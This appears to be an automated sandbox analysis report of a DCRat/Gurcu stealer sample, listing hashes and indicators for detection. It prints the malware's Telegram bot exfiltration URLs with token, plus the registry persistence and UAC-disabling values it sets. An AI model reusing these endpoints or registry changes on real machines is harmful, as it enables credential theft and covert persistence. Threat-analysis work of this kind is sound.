dcrat | 007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2024 02:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Size

2.2MB
MD5

59b9f54f927431d2cf31d3aa202a0843
SHA1

b23d214605133dc8e930f9a9d473c7c7622b4b56
SHA256

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594
SHA512

89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8
SSDEEP

24576:9zyhnYISyKSBWpKCeCirC9CMz+052LEgPHQ944INbKK6uK5Ye6KBOO3op+kE9hk4:9zyt2DixLb4I5KKnK5zgdlKWky

Score

10^/10

dcrat gurcu discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20f53345edb0d7a92f262059fbcb293eecc09ee495%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20KBKWGEBK%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%5CMicrosoft%20Office%5CPackageManifests%5COfficeClickToRun.ex

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20f53345edb0d7a92f262059fbcb293eecc09ee495%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A26.407511

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Modifies WinLogon for persistence 2 TTPs 14 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\winlogon.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\", \"C:\\Users\\Public\\Downloads\\csrss.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\winlogon.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\", \"C:\\Users\\Public\\Downloads\\csrss.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\System.exe\", \"C:\\Windows\\AppReadiness\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\fr-FR\\dwm.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\winlogon.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\winlogon.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\", \"C:\\Users\\Public\\Downloads\\csrss.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\System.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\winlogon.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\winlogon.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\", \"C:\\Users\\Public\\Downloads\\csrss.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\System.exe\", \"C:\\Windows\\AppReadiness\\SppExtComObj.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Process spawned unexpected child process 42 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1204	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4948	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	336	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4576	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	416	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4680	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1832	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3692	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	848	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3560	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3520	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4728	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2532	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	996	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3244	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2428	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	116	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	216	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1956	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3868	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	636	2104	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4400	2104	schtasks.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exeOfficeClickToRun.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	OfficeClickToRun.exe

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral2/memory/4888-1-0x00000000004B0000-0x00000000006DE000-memory.dmp	dcrat
C:\Program Files\7-Zip\Lang\SearchApp.exe	dcrat
C:\ProgramData\RCX8C8.tmp	dcrat
C:\Program Files\7-Zip\Lang\SearchApp.exe	dcrat
C:\Recovery\WindowsRE\winlogon.exe	dcrat
C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe	dcrat
behavioral2/memory/772-245-0x00000000001F0000-0x000000000041E000-memory.dmp	dcrat

Drops file in Drivers directory 1 IoCs

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exeOfficeClickToRun.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	OfficeClickToRun.exe

Executes dropped EXE 1 IoCs

Processes:

OfficeClickToRun.exe

pid process

772 OfficeClickToRun.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
772	OfficeClickToRun.exe

Adds Run key to start application 2 TTPs 28 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\fr-FR\\dwm.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Users\\All Users\\taskhostw.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files\\7-Zip\\Lang\\SearchApp.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\Performance\\WinSAT\\DataStore\\System.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\Performance\\WinSAT\\DataStore\\System.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Users\\All Users\\taskhostw.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\AppReadiness\\SppExtComObj.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\StartMenuExperienceHost.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\WindowsRE\\winlogon.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Windows\\Performance\\WinSAT\\DataStore\\spoolsv.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Public\\Downloads\\csrss.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Microsoft\\AppV\\RuntimeBroker.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\OfficeClickToRun.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\AppReadiness\\SppExtComObj.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\fr-FR\\dwm.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\WindowsRE\\winlogon.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
